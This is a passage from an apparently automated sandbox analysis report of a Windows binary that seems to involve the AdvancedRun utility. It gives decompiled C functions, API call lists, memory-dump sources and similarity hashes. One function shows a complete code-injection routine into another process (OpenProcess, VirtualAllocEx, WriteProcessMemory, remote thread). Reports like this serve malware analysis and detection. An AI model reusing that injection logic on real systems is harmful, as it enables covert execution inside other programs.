					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}





























                                                                                      0x004056b5
                                                                                      0x004056c3
                                                                                      0x004056c5
                                                                                      0x004056cc
                                                                                      0x004056cf
                                                                                      0x004056d2
                                                                                      0x004056d5
                                                                                      0x004056dc
                                                                                      0x004056df
                                                                                      0x004056e2
                                                                                      0x004056e5
                                                                                      0x004056e8
                                                                                      0x004056ef
                                                                                      0x004056f2
                                                                                      0x004056f7
                                                                                      0x004056fd
                                                                                      0x00405832
                                                                                      0x00405832
                                                                                      0x00405835
                                                                                      0x00405835
                                                                                      0x00405838
                                                                                      0x0040583e
                                                                                      0x00405849
                                                                                      0x00405849
                                                                                      0x00405703
                                                                                      0x00405706
                                                                                      0x00405709
                                                                                      0x00405710
                                                                                      0x0040575b
                                                                                      0x00405766
                                                                                      0x0040577b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040577d
                                                                                      0x00000000
                                                                                      0x0040577d
                                                                                      0x0040576b
                                                                                      0x0040576e
                                                                                      0x00000000
                                                                                      0x00405783
                                                                                      0x00405783
                                                                                      0x00405785
                                                                                      0x004057d1
                                                                                      0x004057dc
                                                                                      0x004057e4
                                                                                      0x004057e8
                                                                                      0x004057eb
                                                                                      0x004057ec
                                                                                      0x004057ef
                                                                                      0x004057ef
                                                                                      0x00000000
                                                                                      0x004057ef
                                                                                      0x0040578b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405790
                                                                                      0x00405796
                                                                                      0x00405798
                                                                                      0x0040579e
                                                                                      0x004057a1
                                                                                      0x004057b4
                                                                                      0x004057a3
                                                                                      0x004057a5
                                                                                      0x004057a5
                                                                                      0x004057ba
                                                                                      0x004057c1
                                                                                      0x004057c3
                                                                                      0x004057c3
                                                                                      0x004057c8
                                                                                      0x004057cb
                                                                                      0x004057cb
                                                                                      0x004057ce
                                                                                      0x00000000
                                                                                      0x004057ce
                                                                                      0x00405717
                                                                                      0x0040571a
                                                                                      0x00405725
                                                                                      0x0040572a
                                                                                      0x0040572f
                                                                                      0x00405733
                                                                                      0x00405735
                                                                                      0x00405735
                                                                                      0x0040573e
                                                                                      0x00405743
                                                                                      0x00405746
                                                                                      0x0040574d
                                                                                      0x00405750
                                                                                      0x00405750
                                                                                      0x0040571a
                                                                                      0x004057f2
                                                                                      0x004057f2
                                                                                      0x004057f8
                                                                                      0x004057fe
                                                                                      0x004057fe
                                                                                      0x00405809
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405810
                                                                                      0x00405815
                                                                                      0x0040581a
                                                                                      0x0040581e
                                                                                      0x00405820
                                                                                      0x00405820
                                                                                      0x00405825
                                                                                      0x0040582b
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                        • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                        • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                      • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID: "
                                                                                      • API String ID: 1294909896-123907689
                                                                                      • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                      • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                      • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                      • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                      0x004054bc
                                                                                      0x004054c4
                                                                                      0x004054cd
                                                                                      0x004054cf
                                                                                      0x004054d2
                                                                                      0x004054d5
                                                                                      0x004054d8
                                                                                      0x004054db
                                                                                      0x004054de

                                                                                      APIs
                                                                                      • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                      • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                      • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                      • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                      • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                      0x00408f4c
                                                                                      0x00408f57
                                                                                      0x00408f60
                                                                                      0x00408f62
                                                                                      0x00408f67
                                                                                      0x00408f67
                                                                                      0x00408f71

                                                                                      APIs
                                                                                        • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                      • String ID:
                                                                                      • API String ID: 187924719-0
                                                                                      • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                      • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                      • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                      • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 37%
                                                                                      			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                      0x004098fa
                                                                                      0x004098fc
                                                                                      0x00409901
                                                                                      0x00409907
                                                                                      0x00000000
                                                                                      0x0040991c
                                                                                      0x00409918
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$FileModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3859505661-0
                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                      0x004095da
                                                                                      0x004095da
                                                                                      0x004095de
                                                                                      0x004095e1
                                                                                      0x004095e7
                                                                                      0x004095e7
                                                                                      0x004095ee
                                                                                      0x004095fc

                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                      • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                      • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                      • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                      0x0040a3d0
                                                                                      0x0040a3d9

                                                                                      APIs
                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: EnumNamesResource
                                                                                      • String ID:
                                                                                      • API String ID: 3334572018-0
                                                                                      • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                      • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                      • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                      • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                      0x004055d1
                                                                                      0x004055d1
                                                                                      0x004055d5
                                                                                      0x004055da
                                                                                      0x004055df
                                                                                      0x004055e3
                                                                                      0x004055e4
                                                                                      0x004055e8
                                                                                      0x004055eb

                                                                                      APIs
                                                                                      • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                      • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                      • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                      • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 70%
                                                                                      			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                      0x0040a474
                                                                                      0x0040a47b
                                                                                      0x0040a48a
                                                                                      0x0040a48d
                                                                                      0x0040a48f
                                                                                      0x0040a497
                                                                                      0x0040a49a
                                                                                      0x0040a6f7
                                                                                      0x0040a6f9
                                                                                      0x0040a700
                                                                                      0x0040a700
                                                                                      0x0040a4ad
                                                                                      0x0040a4b3
                                                                                      0x0040a4b8
                                                                                      0x0040a4c6
                                                                                      0x0040a4cc
                                                                                      0x0040a4cf
                                                                                      0x0040a4dd
                                                                                      0x0040a4e2
                                                                                      0x0040a4e3
                                                                                      0x0040a4ea
                                                                                      0x0040a4e5
                                                                                      0x0040a4e5
                                                                                      0x0040a4e5
                                                                                      0x0040a4ec
                                                                                      0x0040a4f6
                                                                                      0x0040a4fe
                                                                                      0x0040a503
                                                                                      0x0040a504
                                                                                      0x0040a50b
                                                                                      0x0040a506
                                                                                      0x0040a506
                                                                                      0x0040a506
                                                                                      0x0040a50d
                                                                                      0x0040a512
                                                                                      0x0040a518
                                                                                      0x0040a51c
                                                                                      0x0040a523
                                                                                      0x0040a523
                                                                                      0x0040a523
                                                                                      0x0040a528
                                                                                      0x0040a537
                                                                                      0x0040a54c
                                                                                      0x0040a539
                                                                                      0x0040a544
                                                                                      0x0040a549
                                                                                      0x0040a558
                                                                                      0x0040a56d
                                                                                      0x0040a55a
                                                                                      0x0040a565
                                                                                      0x0040a56a
                                                                                      0x0040a579
                                                                                      0x0040a591
                                                                                      0x0040a57b
                                                                                      0x0040a589
                                                                                      0x0040a58e
                                                                                      0x0040a5b4
                                                                                      0x0040a5b7
                                                                                      0x0040a5cc
                                                                                      0x0040a5cf
                                                                                      0x0040a5d4
                                                                                      0x0040a5d7
                                                                                      0x0040a6ed
                                                                                      0x0040a5e5
                                                                                      0x0040a5fa
                                                                                      0x0040a60b
                                                                                      0x0040a61a
                                                                                      0x0040a620
                                                                                      0x0040a623
                                                                                      0x0040a62b
                                                                                      0x0040a62f
                                                                                      0x0040a632
                                                                                      0x0040a659
                                                                                      0x0040a634
                                                                                      0x0040a635
                                                                                      0x0040a641
                                                                                      0x0040a648
                                                                                      0x0040a648
                                                                                      0x0040a668
                                                                                      0x0040a66e
                                                                                      0x0040a685
                                                                                      0x0040a69e
                                                                                      0x0040a6a8
                                                                                      0x0040a6ad
                                                                                      0x0040a6bd
                                                                                      0x0040a6c5
                                                                                      0x0040a6c8
                                                                                      0x0040a6d0
                                                                                      0x0040a6d1
                                                                                      0x0040a6d2
                                                                                      0x0040a6d3
                                                                                      0x0040a6d3
                                                                                      0x0040a6c8
                                                                                      0x0040a6d7
                                                                                      0x0040a6dc
                                                                                      0x0040a6dc
                                                                                      0x0040a6d7
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                      • memset.MSVCRT ref: 0040A4B3
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                        • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                        • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                        • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                      • memset.MSVCRT ref: 0040A66E
                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                      • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                      • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                      • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                      • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                      • API String ID: 1572607441-20550370
                                                                                      • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                      • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                      • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
